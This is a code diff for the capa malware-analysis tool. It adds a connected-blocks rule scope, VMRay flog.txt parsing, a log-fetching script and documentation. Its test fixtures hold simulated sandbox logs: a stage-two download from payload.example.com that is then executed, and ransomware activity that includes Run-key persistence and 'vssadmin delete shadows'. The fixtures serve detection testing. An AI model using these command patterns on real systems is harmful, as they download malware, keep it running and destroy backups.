--- a/capa/ida/plugin/cache.py +++ b/capa/ida/plugin/cache.py @@ -17,6 +17,7 @@ import itertools import collections +from collections import deque from typing import Union, Optional import capa.engine @@ -160,19 +161,53 @@ def _find_basic_block_capabilities( return features, matches, insn_matches + def _build_connected_block_adjacency( + self, fh: FunctionHandle, f_node: CapaRuleGenFeatureCacheNode + ) -> dict[Address, set[Address]]: + adjacency: dict[Address, set[Address]] = collections.defaultdict(set) + bbs_by_address = {bb.address: bb for bb in f_node.children} + for bb in f_node.children: + adjacency[bb.address] + assert isinstance(bb.inner, BBHandle) + for succ in self.extractor.get_cfg_edges(fh, bb.inner): + if succ.address in bbs_by_address: + adjacency[bb.address].add(succ.address) + adjacency[succ.address].add(bb.address) + return adjacency + + @staticmethod + def _collect_connected_neighborhood( + adjacency: dict[Address, set[Address]], seed: Address, depth: int = 2 + ) -> set[Address]: + seen = {seed} + q = deque([(seed, 0)]) + while q: + node, d = q.popleft() + if d >= depth: + continue + for succ in adjacency.get(node, ()): + if succ in seen: + continue + seen.add(succ) + q.append((succ, d + 1)) + return seen + def find_code_capabilities( self, ruleset: RuleSet, fh: FunctionHandle - ) -> tuple[FeatureSet, MatchResults, MatchResults, MatchResults]: + ) -> tuple[FeatureSet, MatchResults, MatchResults, MatchResults, MatchResults]: f_node: Optional[CapaRuleGenFeatureCacheNode] = self._get_cached_func_node(fh) if f_node is None: - return {}, {}, {}, {} + return {}, {}, {}, {}, {} insn_matches: MatchResults = collections.defaultdict(list) bb_matches: MatchResults = collections.defaultdict(list) + connected_block_matches: MatchResults = collections.defaultdict(list) function_features: FeatureSet = collections.defaultdict(set) + bb_features_by_address: dict[Address, FeatureSet] = {} for bb in f_node.children: features, bmatches, imatches = self._find_basic_block_capabilities(ruleset, bb) + bb_features_by_address[bb.address] = features for feature, locs in features.items(): function_features[feature].update(locs) for name, result in bmatches.items(): @@ -180,11 +215,27 @@ def find_code_capabilities( for name, result in imatches.items(): insn_matches[name].extend(result) + if ruleset.connected_block_rules: + adjacency = self._build_connected_block_adjacency(fh, f_node) + for bb in f_node.children: + neighborhood = self._collect_connected_neighborhood(adjacency, bb.address, depth=2) + neighborhood_features: FeatureSet = collections.defaultdict(set) + for bb_addr in neighborhood: + for feature, locs in bb_features_by_address.get(bb_addr, {}).items(): + neighborhood_features[feature].update(locs) + + _, matches = ruleset.match(Scope.CONNECTED_BLOCKS, neighborhood_features, bb.address) + for name, result in matches.items(): + connected_block_matches[name].extend(result) + rule = ruleset[name] + for loc, _ in result: + capa.engine.index_rule_matches(function_features, rule, [loc]) + for feature, locs in itertools.chain(f_node.features.items(), self.global_features.items()): function_features[feature].update(locs) _, function_matches = ruleset.match(Scope.FUNCTION, function_features, f_node.address) - return function_features, function_matches, bb_matches, insn_matches + return function_features, function_matches, connected_block_matches, bb_matches, insn_matches def find_file_capabilities(self, ruleset: RuleSet) -> tuple[FeatureSet, MatchResults]: features: FeatureSet = collections.defaultdict(set) @@ -193,7 +244,7 @@ def find_file_capabilities(self, ruleset: RuleSet) -> tuple[FeatureSet, MatchRes assert func_node.inner is not None assert isinstance(func_node.inner, FunctionHandle) - func_features, _, _, _ = self.find_code_capabilities(ruleset, func_node.inner) + func_features, _, _, _, _ = self.find_code_capabilities(ruleset, func_node.inner) for feature, locs in func_features.items(): features[feature].update(locs) diff --git a/capa/ida/plugin/form.py b/capa/ida/plugin/form.py index 800453bbfa..600ad0ccb2 100644 --- a/capa/ida/plugin/form.py +++ b/capa/ida/plugin/form.py @@ -1028,14 +1028,16 @@ def load_capa_function_results(self): all_function_features: FeatureSet = collections.defaultdict(set) try: if self.rulegen_current_function is not None: - _, func_matches, bb_matches, insn_matches = self.rulegen_feature_cache.find_code_capabilities( + _, func_matches, cbb_matches, bb_matches, insn_matches = self.rulegen_feature_cache.find_code_capabilities( ruleset, self.rulegen_current_function ) all_function_features.update( self.rulegen_feature_cache.get_all_function_features(self.rulegen_current_function) ) - for name, result in itertools.chain(func_matches.items(), bb_matches.items(), insn_matches.items()): + for name, result in itertools.chain( + func_matches.items(), cbb_matches.items(), bb_matches.items(), insn_matches.items() + ): rule = ruleset[name] if rule.is_subscope_rule(): continue @@ -1204,12 +1206,13 @@ def update_rule_status(self, rule_text: str): s in rule.scopes for s in ( capa.rules.Scope.FUNCTION, + capa.rules.Scope.CONNECTED_BLOCKS, capa.rules.Scope.BASIC_BLOCK, capa.rules.Scope.INSTRUCTION, ) ): try: - _, func_matches, bb_matches, insn_matches = self.rulegen_feature_cache.find_code_capabilities( + _, func_matches, cbb_matches, bb_matches, insn_matches = self.rulegen_feature_cache.find_code_capabilities( ruleset, self.rulegen_current_function ) except Exception as e: @@ -1218,6 +1221,8 @@ def update_rule_status(self, rule_text: str): if capa.rules.Scope.FUNCTION in rule.scopes and rule.name in func_matches: is_match = True + elif capa.rules.Scope.CONNECTED_BLOCKS in rule.scopes and rule.name in cbb_matches: + is_match = True elif capa.rules.Scope.BASIC_BLOCK in rule.scopes and rule.name in bb_matches: is_match = True elif capa.rules.Scope.INSTRUCTION in rule.scopes and rule.name in insn_matches: diff --git a/capa/ida/plugin/model.py b/capa/ida/plugin/model.py index 046dc1ea3f..e600e5c0c7 100644 --- a/capa/ida/plugin/model.py +++ b/capa/ida/plugin/model.py @@ -530,7 +530,10 @@ def render_capa_doc_by_program(self, doc: rd.ResultDocument): parent2 = parent elif capa.rules.Scope.FUNCTION in rule.meta.scopes: parent2 = CapaExplorerFunctionItem(parent, location) - elif capa.rules.Scope.BASIC_BLOCK in rule.meta.scopes: + elif ( + capa.rules.Scope.BASIC_BLOCK in rule.meta.scopes + or capa.rules.Scope.CONNECTED_BLOCKS in rule.meta.scopes + ): parent2 = CapaExplorerBlockItem(parent, location) elif capa.rules.Scope.INSTRUCTION in rule.meta.scopes: parent2 = CapaExplorerInstructionItem(parent, location) diff --git a/capa/loader.py b/capa/loader.py index d89d4c09fb..253cd04cc5 100644 --- a/capa/loader.py +++ b/capa/loader.py @@ -236,6 +236,8 @@ def get_extractor( elif backend == BACKEND_VMRAY: import capa.features.extractors.vmray.extractor + if input_path.name.endswith("flog.txt"): + return capa.features.extractors.vmray.extractor.VMRayExtractor.from_flog_txt(input_path) return capa.features.extractors.vmray.extractor.VMRayExtractor.from_zipfile(input_path) elif backend == BACKEND_DOTNET: @@ -491,7 +493,14 @@ def get_file_extractors(input_file: Path, input_format: str) -> list[FeatureExtr elif input_format == FORMAT_VMRAY: import capa.features.extractors.vmray.extractor - file_extractors.append(capa.features.extractors.vmray.extractor.VMRayExtractor.from_zipfile(input_file)) + if input_file.name.endswith("flog.txt"): + file_extractors.append( + capa.features.extractors.vmray.extractor.VMRayExtractor.from_flog_txt(input_file) + ) + else: + file_extractors.append( + capa.features.extractors.vmray.extractor.VMRayExtractor.from_zipfile(input_file) + ) elif input_format == FORMAT_BINEXPORT2: file_extractors = _get_binexport2_file_extractors(input_file) @@ -720,7 +729,7 @@ def compute_static_layout(rules: RuleSet, extractor: StaticFeatureExtractor, cap matched_bbs = set() for rule_name, matches in capabilities.items(): rule = rules[rule_name] - if capa.rules.Scope.BASIC_BLOCK in rule.scopes: + if capa.rules.Scope.BASIC_BLOCK in rule.scopes or capa.rules.Scope.CONNECTED_BLOCKS in rule.scopes: for addr, _ in matches: assert addr in functions_by_bb matched_bbs.add(addr) diff --git a/capa/render/proto/__init__.py b/capa/render/proto/__init__.py index 31b272e525..f28d910f1f 100644 --- a/capa/render/proto/__init__.py +++ b/capa/render/proto/__init__.py @@ -155,6 +155,10 @@ def scope_to_pb2(scope: capa.rules.Scope) -> capa_pb2.Scope.ValueType: return capa_pb2.Scope.SCOPE_FILE elif scope == capa.rules.Scope.FUNCTION: return capa_pb2.Scope.SCOPE_FUNCTION + elif scope == capa.rules.Scope.CONNECTED_BLOCKS: + # protobuf schema does not yet have a dedicated static connected-block scope enum. + # encode as basic block for wire compatibility. + return capa_pb2.Scope.SCOPE_BASIC_BLOCK elif scope == capa.rules.Scope.BASIC_BLOCK: return capa_pb2.Scope.SCOPE_BASIC_BLOCK elif scope == capa.rules.Scope.INSTRUCTION: diff --git a/capa/rules/__init__.py b/capa/rules/__init__.py index da0a7d0360..49170b1440 100644 --- a/capa/rules/__init__.py +++ b/capa/rules/__init__.py @@ -89,6 +89,7 @@ class Scope(str, Enum): SPAN_OF_CALLS = "span of calls" CALL = "call" FUNCTION = "function" + CONNECTED_BLOCKS = "connected blocks" BASIC_BLOCK = "basic block" INSTRUCTION = "instruction" @@ -107,6 +108,7 @@ def to_yaml(cls, representer, node): Scope.FILE, Scope.GLOBAL, Scope.FUNCTION, + Scope.CONNECTED_BLOCKS, Scope.BASIC_BLOCK, Scope.INSTRUCTION, } @@ -219,6 +221,10 @@ def from_dict(self, scopes: dict[str, str]) -> "Scopes": capa.features.common.Characteristic("recursive call"), # plus basic block scope features, see below }, + Scope.CONNECTED_BLOCKS: { + capa.features.common.MatchedRule, + # plus basic block scope features, see below + }, Scope.BASIC_BLOCK: { capa.features.common.MatchedRule, capa.features.common.Characteristic("tight loop"), @@ -252,6 +258,7 @@ def from_dict(self, scopes: dict[str, str]) -> "Scopes": # global scope features are available in all other scopes SUPPORTED_FEATURES[Scope.INSTRUCTION].update(SUPPORTED_FEATURES[Scope.GLOBAL]) SUPPORTED_FEATURES[Scope.BASIC_BLOCK].update(SUPPORTED_FEATURES[Scope.GLOBAL]) +SUPPORTED_FEATURES[Scope.CONNECTED_BLOCKS].update(SUPPORTED_FEATURES[Scope.GLOBAL]) SUPPORTED_FEATURES[Scope.FUNCTION].update(SUPPORTED_FEATURES[Scope.GLOBAL]) SUPPORTED_FEATURES[Scope.FILE].update(SUPPORTED_FEATURES[Scope.GLOBAL]) SUPPORTED_FEATURES[Scope.PROCESS].update(SUPPORTED_FEATURES[Scope.GLOBAL]) @@ -269,6 +276,8 @@ def from_dict(self, scopes: dict[str, str]) -> "Scopes": # all instruction scope features are also basic block features SUPPORTED_FEATURES[Scope.BASIC_BLOCK].update(SUPPORTED_FEATURES[Scope.INSTRUCTION]) +# all basic block scope features are also connected blocks features +SUPPORTED_FEATURES[Scope.CONNECTED_BLOCKS].update(SUPPORTED_FEATURES[Scope.BASIC_BLOCK]) # all basic block scope features are also function scope features SUPPORTED_FEATURES[Scope.FUNCTION].update(SUPPORTED_FEATURES[Scope.BASIC_BLOCK]) @@ -588,9 +597,31 @@ def unique(sequence): return [x for x in sequence if not (x in seen or seen.add(x))] # type: ignore [func-returns-value] +def parse_connected_blocks_subscope_key(key: str) -> bool: + """ + return True when the key denotes a connected-blocks subscope declaration. + + supported forms: + - connected blocks + - connected_blocks(depth=2) + """ + if key == "connected blocks": + return True + + if not key.startswith("connected_blocks(") or not key.endswith(")"): + return False + + body = key[len("connected_blocks(") : -len(")")] + if body != "depth=2": + raise InvalidRule("only connected_blocks(depth=2) is supported") + + return True + + STATIC_SCOPE_ORDER = [ Scope.FILE, Scope.FUNCTION, + Scope.CONNECTED_BLOCKS, Scope.BASIC_BLOCK, Scope.INSTRUCTION, ] @@ -707,7 +738,7 @@ def build_statements(d, scopes: Scopes): elif key == "basic block": if not is_subscope_compatible(scopes.static, Scope.BASIC_BLOCK): - raise InvalidRule("`basic block` subscope supported only for `function` scope") + raise InvalidRule("`basic block` subscope supported only for `function` and `connected blocks` scope") if len(d[key]) != 1: raise InvalidRule("subscope must have exactly one child statement") @@ -716,9 +747,25 @@ def build_statements(d, scopes: Scopes): Scope.BASIC_BLOCK, build_statements(d[key][0], Scopes(static=Scope.BASIC_BLOCK)), description=description ) + elif parse_connected_blocks_subscope_key(key): + if not is_subscope_compatible(scopes.static, Scope.CONNECTED_BLOCKS): + raise InvalidRule("`connected blocks` subscope supported only for `function` scope") + + if len(d[key]) != 1: + raise InvalidRule("subscope must have exactly one child statement") + + # MVP: fixed proximity depth=2 in static matching pipeline. + return ceng.Subscope( + Scope.CONNECTED_BLOCKS, + build_statements(d[key][0], Scopes(static=Scope.CONNECTED_BLOCKS)), + description=description, + ) + elif key == "instruction": if not is_subscope_compatible(scopes.static, Scope.INSTRUCTION): - raise InvalidRule("`instruction` subscope supported only for `function` and `basic block` scope") + raise InvalidRule( + "`instruction` subscope supported only for `function`, `connected blocks`, and `basic block` scope" + ) if len(d[key]) == 1: statements = build_statements(d[key][0], Scopes(static=Scope.INSTRUCTION)) @@ -1433,6 +1480,7 @@ def __init__( Scope.PROCESS, Scope.INSTRUCTION, Scope.BASIC_BLOCK, + Scope.CONNECTED_BLOCKS, Scope.FUNCTION, Scope.FILE, ) @@ -1475,6 +1523,10 @@ def function_rules(self): def basic_block_rules(self): return self.rules_by_scope[Scope.BASIC_BLOCK] + @property + def connected_block_rules(self): + return self.rules_by_scope[Scope.CONNECTED_BLOCKS] + @property def instruction_rules(self): return self.rules_by_scope[Scope.INSTRUCTION] diff --git a/doc/usage.md b/doc/usage.md index 6a207ed6f6..d3ccfa8fd9 100644 --- a/doc/usage.md +++ b/doc/usage.md @@ -2,10 +2,50 @@ See `capa -h` for all supported arguments and usage examples. +## Ways to consume capa output + +| Option | Description | Typical use | +|--------|-------------|-------------| +| **CLI** | `capa` on the command line | Scripting, CI/CD, one-off analysis | +| [**IDA Pro**](https://github.com/mandiant/capa/tree/master/capa/ida/plugin) | capa Explorer plugin inside IDA | Interactive analysis with jump-to-address | +| [**Ghidra**](https://github.com/mandiant/capa/tree/master/capa/ghidra/plugin) | capa Explorer plugin inside Ghidra | Interactive analysis with Ghidra integration | +| [**CAPE**](https://www.mandiant.com/resources/blog/dynamic-capa-executable-behavior-cape-sandbox) | capa run on sandbox report (e.g. CAPE, VMRay ZIP or VMRay flog.txt) | Dynamic analysis of sandbox output | +| [**Web (capa Explorer)**](https://mandiant.github.io/capa/explorer/) | Web UI (upload JSON or load from URL) | Sharing results, viewing from VirusTotal or similar | + ## Default vs verbose output By default, capa shows only *top-level* rule matches: capabilities that are not already implied by another displayed rule. For example, if a rule "persist via Run registry key" matches and it *contains* a match for "set registry value", the default output lists only "persist via Run registry key". This keeps the default output short while still reflecting all detected capabilities at the top level. Use **`-v`** to see all rule matches, including nested ones. Use **`-vv`** for an even more detailed view that shows how each rule matched. +## VMRay: flog.txt vs full analysis archive + +When analysing VMRay output you can give capa either the full analysis **ZIP archive** or just the **flog.txt** function-log file. +Choose based on what you have access to and what features you need. + +| | **flog.txt** (free, "Download Function Log") | **Full VMRay ZIP archive** | +|-|-|-| +| **How to obtain** | VMRay Threat Feed → Full Report → *Download Function Log* | Purchased subscription; *Download Analysis Archive* | +| **File size** | Small text file | Large encrypted ZIP | +| **Dynamic API calls** | ✓ | ✓ | +| **String arguments** | ✓ (parsed from text) | ✓ (from structured XML) | +| **Numeric arguments** | ✓ (parsed from text) | ✓ (from structured XML) | +| **Static imports / exports** | ✗ | ✓ | +| **PE/ELF section names** | ✗ | ✓ | +| **Embedded file strings** | ✗ | ✓ | +| **Base address** | ✗ | ✓ | +| **Argument names** | ✓ (text-format `name=value`) | ✓ (structured XML) | + +**When to use flog.txt:** You only have access to VMRay Threat Feed without a full subscription, or you want a quick first pass using only the freely-available function log. + +**When to use the full archive:** You need static features (imports, exports, strings, section names) in addition to dynamic behaviour, or you want the highest-fidelity argument data. + +``` +# flog.txt — free, limited to dynamic API calls +capa path/to/flog.txt + +# Full VMRay archive — requires subscription, richer features +capa path/to/analysis_archive.zip +``` + ## tips and tricks ### only run selected rules diff --git a/scripts/demo_connected_blocks_and_triage.py b/scripts/demo_connected_blocks_and_triage.py new file mode 100644 index 0000000000..ac8f9b7e8a --- /dev/null +++ b/scripts/demo_connected_blocks_and_triage.py @@ -0,0 +1,84 @@ +#!/usr/bin/env python3 +# Copyright 2026 Google LLC +# +# Licensed under the Apache License, Version 2.0 (the "License"); +# you may not use this file except in compliance with the License. +# You may obtain a copy of the License at +# +# http://www.apache.org/licenses/LICENSE-2.0 +# +# Unless required by applicable law or agreed to in writing, software +# distributed under the License is distributed on an "AS IS" BASIS, +# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. +# See the License for the specific language governing permissions and +# limitations under the License. + +""" +Demo helper for: + - function triage counts (skip/deprioritize/analyze) + - connected-block rule syntax +""" + +import argparse +import textwrap +from pathlib import Path +from collections import Counter +from typing import Counter as CounterType + +import capa.loader +import capa.rules +from capa.rules import Scope +from capa.capabilities.triage import TriageDecision, classify_function +from capa.features.extractors.viv.extractor import VivisectFeatureExtractor +from capa.features.common import OS_AUTO, FORMAT_AUTO + + +CONNECTED_BLOCKS_RULE = textwrap.dedent( + """ + rule: + meta: + name: demo connected blocks + scopes: + static: function + dynamic: process + features: + - connected blocks: + - and: + - api: kernel32.CreateFileA + - api: kernel32.WriteFile + """ +) + + +def main(): + parser = argparse.ArgumentParser() + parser.add_argument("input", type=Path, help="sample path") + args = parser.parse_args() + + vw = capa.loader.get_workspace(args.input, FORMAT_AUTO, sigpaths=[]) + extractor = VivisectFeatureExtractor(vw, args.input, OS_AUTO) + + triage_counts: CounterType[str] = Counter() + for fh in extractor.get_functions(): + if extractor.is_library_function(fh.address): + triage_counts[TriageDecision.SKIP.value] += 1 + continue + triage = classify_function(extractor, fh) + triage_counts[triage.decision.value] += 1 + + print("triage counts:") + print(f" analyze : {triage_counts[TriageDecision.ANALYZE.value]}") + print(f" deprioritize : {triage_counts[TriageDecision.DEPRIORITIZE.value]}") + print(f" skip : {triage_counts[TriageDecision.SKIP.value]}") + print() + print("connected blocks rule syntax:") + print(CONNECTED_BLOCKS_RULE.strip()) + + r = capa.rules.Rule.from_yaml(CONNECTED_BLOCKS_RULE) + print() + print("parsed rule scopes:", r.scopes) + print("connected blocks scope literal:", Scope.CONNECTED_BLOCKS.value) + + +if __name__ == "__main__": + main() diff --git a/scripts/fetch-vmray-flog.py b/scripts/fetch-vmray-flog.py new file mode 100644 index 0000000000..e9859056dc --- /dev/null +++ b/scripts/fetch-vmray-flog.py @@ -0,0 +1,270 @@ +#!/usr/bin/env python3 +# Copyright 2025 Google LLC +# +# Licensed under the Apache License, Version 2.0 (the "License"); +# you may not use this file except in compliance with the License. +# You may obtain a copy of the License at +# +# http://www.apache.org/licenses/LICENSE-2.0 +# +# Unless required by applicable law or agreed to in writing, software +# distributed under the License is distributed on an "AS IS" BASIS, +# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. +# See the License for the specific language governing permissions and +# limitations under the License. + +""" +Fetch the VMRay Function Log (flog.txt) for a sample and optionally run capa against it. + +Given a sample SHA-256 hash and VMRay credentials, this script: + 1. Looks up the sample on the VMRay instance. + 2. Finds the most-recent analysis for that sample. + 3. Downloads the flog.txt (Download Function Log) from the analysis archive. + 4. Optionally runs capa against the downloaded file. + +Requirements: + pip install requests + +Usage:: + + python scripts/fetch-vmray-flog.py \\ + --url https://your-vmray.example.com \\ + --apikey YOUR_API_KEY \\ + --sha256 d46900384c78863420fb3e297d0a2f743cd2b6b3f7f82bf64059a168e07aceb7 \\ + --output /tmp/sample_flog.txt + + # Fetch and immediately run capa: + python scripts/fetch-vmray-flog.py \\ + --url https://your-vmray.example.com \\ + --apikey YOUR_API_KEY \\ + --sha256 d46900384c78863420fb3e297d0a2f743cd2b6b3f7f82bf64059a168e07aceb7 \\ + --run-capa + +VMRay API reference: + https://docs.vmray.com/documents/api-reference/ + +Note: this script requires a VMRay account. The flog.txt itself is freely available +("Download Function Log") in the VMRay Threat Feed web UI, but downloading it +programmatically via the REST API requires valid API credentials. +""" + +import argparse +import logging +import subprocess +import sys +from pathlib import Path + +import requests + +logger = logging.getLogger(__name__) + +# --------------------------------------------------------------------------- +# VMRay REST API helpers +# --------------------------------------------------------------------------- + +_FLOG_TXT_ARCHIVE_PATH = "logs/flog_txt" + + +def _session(url: str, apikey: str) -> requests.Session: + """Return an authenticated requests.Session for the given VMRay instance.""" + s = requests.Session() + s.headers.update( + { + "Authorization": f"api_key {apikey}", + "Accept": "application/json", + } + ) + s.verify = True # set to False only when using self-signed certificates + s.base_url = url.rstrip("/") # type: ignore[attr-defined] + return s + + +def _get(session: requests.Session, path: str, **kwargs) -> dict: + url = f"{session.base_url}{path}" # type: ignore[attr-defined] + resp = session.get(url, **kwargs) + resp.raise_for_status() + return resp.json() + + +def _get_bytes(session: requests.Session, path: str, **kwargs) -> bytes: + url = f"{session.base_url}{path}" # type: ignore[attr-defined] + resp = session.get(url, **kwargs) + resp.raise_for_status() + return resp.content + + +def lookup_sample(session: requests.Session, sha256: str) -> dict: + """ + Return the VMRay sample record for the given SHA-256. + Raises ValueError if the sample is not found. + """ + data = _get(session, f"/rest/sample/sha256/{sha256}") + if data.get("result") != "ok" or not data.get("data"): + raise ValueError(f"sample not found on VMRay instance: {sha256}") + # data["data"] is a list; take the first entry + return data["data"][0] + + +def get_latest_analysis(session: requests.Session, sample_id: int) -> dict: + """ + Return the most-recent finished analysis for the given VMRay sample ID. + Raises ValueError if no analysis is found. + """ + data = _get(session, "/rest/analysis", params={"sample_id": sample_id}) + analyses = data.get("data", []) + if not analyses: + raise ValueError(f"no analyses found for sample_id={sample_id}") + # Sort by analysis_id descending (newest first) + analyses.sort(key=lambda a: a.get("analysis_id", 0), reverse=True) + return analyses[0] + + +def download_flog_txt(session: requests.Session, analysis_id: int) -> bytes: + """ + Download the flog.txt content for the given VMRay analysis ID. + + VMRay exposes the function log via the analysis archive endpoint. + We request only the flog_txt entry from the archive using the + ``file_filter`` query parameter. + """ + # Try the dedicated log endpoint first (VMRay >= 2024.x) + try: + content = _get_bytes( + session, + f"/rest/analysis/{analysis_id}/export/v2/logs/flog_txt/binary", + ) + if content: + return content + except requests.HTTPError: + pass + + # Fallback: download via the analysis archive with a file filter + content = _get_bytes( + session, + f"/rest/analysis/{analysis_id}/archive", + params={"file_filter[]": _FLOG_TXT_ARCHIVE_PATH}, + ) + return content + + +# --------------------------------------------------------------------------- +# main +# --------------------------------------------------------------------------- + + +def main(argv=None): + if argv is None: + argv = sys.argv[1:] + + parser = argparse.ArgumentParser( + description="Download VMRay flog.txt for a sample hash and (optionally) run capa." + ) + parser.add_argument( + "--url", + required=True, + metavar="URL", + help="Base URL of your VMRay instance, e.g. https://cloud.vmray.com", + ) + parser.add_argument( + "--apikey", + required=True, + metavar="KEY", + help="VMRay REST API key (Settings → API Keys).", + ) + parser.add_argument( + "--sha256", + required=True, + metavar="SHA256", + help="SHA-256 hash of the sample to analyse.", + ) + parser.add_argument( + "--output", + metavar="PATH", + help="Where to save the downloaded flog.txt. Defaults to _flog.txt in the current directory.", + ) + parser.add_argument( + "--run-capa", + action="store_true", + dest="run_capa", + help="After downloading, run 'capa ' and print the results.", + ) + parser.add_argument( + "--capa-args", + metavar="ARGS", + default="", + help="Extra arguments forwarded to capa (only used with --run-capa).", + ) + parser.add_argument( + "--no-verify-ssl", + action="store_false", + dest="verify_ssl", + help="Disable SSL certificate verification (useful for on-premise instances with self-signed certs).", + ) + parser.add_argument( + "-d", "--debug", action="store_true", help="Enable debug logging." + ) + args = parser.parse_args(argv) + + logging.basicConfig( + level=logging.DEBUG if args.debug else logging.INFO, + format="%(levelname)s: %(message)s", + ) + + output_path = Path(args.output) if args.output else Path(f"{args.sha256}_flog.txt") + + session = _session(args.url, args.apikey) + session.verify = args.verify_ssl # type: ignore[assignment] + + # Step 1 — look up sample + logger.info("looking up sample %s …", args.sha256) + try: + sample = lookup_sample(session, args.sha256) + except (requests.HTTPError, ValueError) as exc: + logger.error("failed to find sample: %s", exc) + return 1 + + sample_id: int = sample["sample_id"] + logger.debug("found sample_id=%d", sample_id) + + # Step 2 — find the latest analysis + logger.info("fetching analysis list for sample_id=%d …", sample_id) + try: + analysis = get_latest_analysis(session, sample_id) + except (requests.HTTPError, ValueError) as exc: + logger.error("failed to find analysis: %s", exc) + return 1 + + analysis_id: int = analysis["analysis_id"] + logger.debug("using analysis_id=%d", analysis_id) + + # Step 3 — download flog.txt + logger.info("downloading flog.txt for analysis_id=%d …", analysis_id) + try: + flog_bytes = download_flog_txt(session, analysis_id) + except requests.HTTPError as exc: + logger.error("failed to download flog.txt: %s", exc) + return 1 + + if not flog_bytes: + logger.error( + "received empty response — flog.txt may not be available for this analysis" + ) + return 1 + + output_path.write_bytes(flog_bytes) + logger.info("saved flog.txt → %s (%d bytes)", output_path, len(flog_bytes)) + + # Step 4 (optional) — run capa + if args.run_capa: + capa_cmd = ["capa", str(output_path)] + ( + args.capa_args.split() if args.capa_args else [] + ) + logger.info("running: %s", " ".join(capa_cmd)) + result = subprocess.run(capa_cmd) + return result.returncode + + return 0 + + +if __name__ == "__main__": + sys.exit(main()) diff --git a/tests/fixtures/vmray/flog_txt/crlf_endings.flog.txt b/tests/fixtures/vmray/flog_txt/crlf_endings.flog.txt new file mode 100644 index 0000000000..cf120d9e6e --- /dev/null +++ b/tests/fixtures/vmray/flog_txt/crlf_endings.flog.txt @@ -0,0 +1,29 @@ +# Log Creation Date: 06.03.2025 09:00:00 +# Analyzer Version: 2024.4.1 +# Flog Txt Version 1 + +Process: +id = "1" +os_pid = "0x0500" +os_parent_pid = "0x0004" +parent_id = "0" +image_name = "downloader.exe" +filename = "c:\users\admin\downloader.exe" +cmd_line = "downloader.exe" +monitor_reason = "analysis_target" + +Region: +id = "1" +name = "private_0x0000000000010000" + +Thread: +id = "1" +os_tid = "0x0501" + [0001.000] InternetOpenA (lpszAgent="WinInet", dwAccessType=0x0, lpszProxyName=NULL, lpszProxyBypass=NULL, dwFlags=0x0) returned 0x4c0000 + [0001.001] InternetConnectA (hInternet=0x4c0000, lpszServerName="payload.example.com", nServerPort=0x50, lpszUserName=NULL, lpszPassword=NULL, dwService=0x3, dwFlags=0x0, dwContext=0x0) returned 0x4c0004 + [0001.002] HttpOpenRequestA (hConnect=0x4c0004, lpszVerb="GET", lpszObjectName="/stage2.bin", lpszVersion=NULL, lpszReferrer=NULL, dwFlags=0x84403100) returned 0x4c0008 + [0001.003] HttpSendRequestA (hRequest=0x4c0008, lpszHeaders=NULL, dwHeadersLength=0x0, lpOptional=NULL, dwOptionalLength=0x0) returned 0x1 + [0001.004] InternetReadFile (hFile=0x4c0008, lpBuffer=0x20000, dwNumberOfBytesToRead=0x10000, lpdwNumberOfBytesRead=0x30000) returned 0x1 + [0001.005] CreateFileA (lpFileName="C:\Windows\Temp\svchost32.exe", dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=NULL, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=NULL) returned 0x60 + [0001.006] WriteFile (hFile=0x60, lpBuffer=0x20000, nNumberOfBytesToWrite=0x10000, lpNumberOfBytesWritten=0x40000, lpOverlapped=NULL) returned 0x1 + [0001.007] WinExec (lpCmdLine="C:\Windows\Temp\svchost32.exe", uCmdShow=0x0) returned 0x21 diff --git a/tests/fixtures/vmray/flog_txt/format_variance.flog.txt b/tests/fixtures/vmray/flog_txt/format_variance.flog.txt new file mode 100644 index 0000000000..473ec0b51f --- /dev/null +++ b/tests/fixtures/vmray/flog_txt/format_variance.flog.txt @@ -0,0 +1,74 @@ +# Log Creation Date: 05.03.2025 14:22:07 +# Analyzer Version: 2024.4.1 +# Flog Txt Version 1 + +Process: +id = "0001" +os_pid = "0x00000ABC" +os_parent_pid = "0x0004" +parent_id = "0000" +image_name = "ransomware.exe" +filename = "c:\\users\\victim\\desktop\\ransomware.exe" +cmd_line = "\"c:\\users\\victim\\desktop\\ransomware.exe\" --silent" +monitor_reason = "analysis_target" + +Region: +id = "0010" +name = "private_0x0000000000010000" + +Thread: +id = "0001" +os_tid = "0x00001B00" + [0001.000] GetCurrentProcess () returned 0xFFFFFFFFFFFFFFFF + [0001.001] CryptAcquireContextW (phProv=0x2000, szContainer=NULL, szProvider=NULL, dwProvType=24, dwFlags=0xF0000000) returned 1 + [0001.002] CryptGenRandom (hProv=0x2000, dwLen=16, pbBuffer=0x3000) returned 1 + [0001.003] CreateFileW (lpFileName="C:\\Users\\victim\\Documents\\important.docx", dwDesiredAccess=0xC0000000, dwShareMode=0x0, lpSecurityAttributes=NULL, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=NULL) returned 0x00000054 + [0001.004] ReadFile (hFile=0x54, lpBuffer=0x4000, nNumberOfBytesToRead=4096, lpNumberOfBytesRead=0x5000, lpOverlapped=NULL) returned 1 + [0001.005] WriteFile (hFile=0x54, lpBuffer=0x6000, nNumberOfBytesToWrite=4096, lpNumberOfBytesWritten=0x7000, lpOverlapped=NULL) returned 1 + [0001.006] CloseHandle (hObject=0x54) returned 1 + [0001.007] MoveFileExW (lpExistingFileName="C:\\Users\\victim\\Documents\\important.docx", lpNewFileName="C:\\Users\\victim\\Documents\\important.docx.locked", dwFlags=0x1) returned 1 + [0001.008] RegOpenKeyExW (hKey=2147483650, lpSubKey="Software\\Microsoft\\Windows\\CurrentVersion\\Run", ulOptions=0, samDesired=131097) returned 0 + [0001.009] RegSetValueExW (hKey=0x100, lpValueName="WindowsDefender", Reserved=0, dwType=1, lpData="C:\\Users\\victim\\Desktop\\ransomware.exe") returned 0 + [0001.010] DeleteFileW (lpFileName="C:\\Windows\\System32\\vssadmin.exe") returned 0x80070005 + [0001.011] CreateProcessW (lpApplicationName=NULL, lpCommandLine="vssadmin.exe delete shadows /all /quiet", dwCreationFlags=8, lpEnvironment=NULL, lpCurrentDirectory=NULL, lpStartupInfo=0x8000, lpProcessInformation=0x9000) returned 1 + [0001.012] InternetOpenW (lpszAgent="Mozilla/4.0 (compatible; MSIE 8.0)", dwAccessType=1, lpszProxyName=NULL, lpszProxyBypass=NULL, dwFlags=0) returned 0x4c9804 + [0001.013] InternetOpenUrlW (hInternet=0x4c9804, 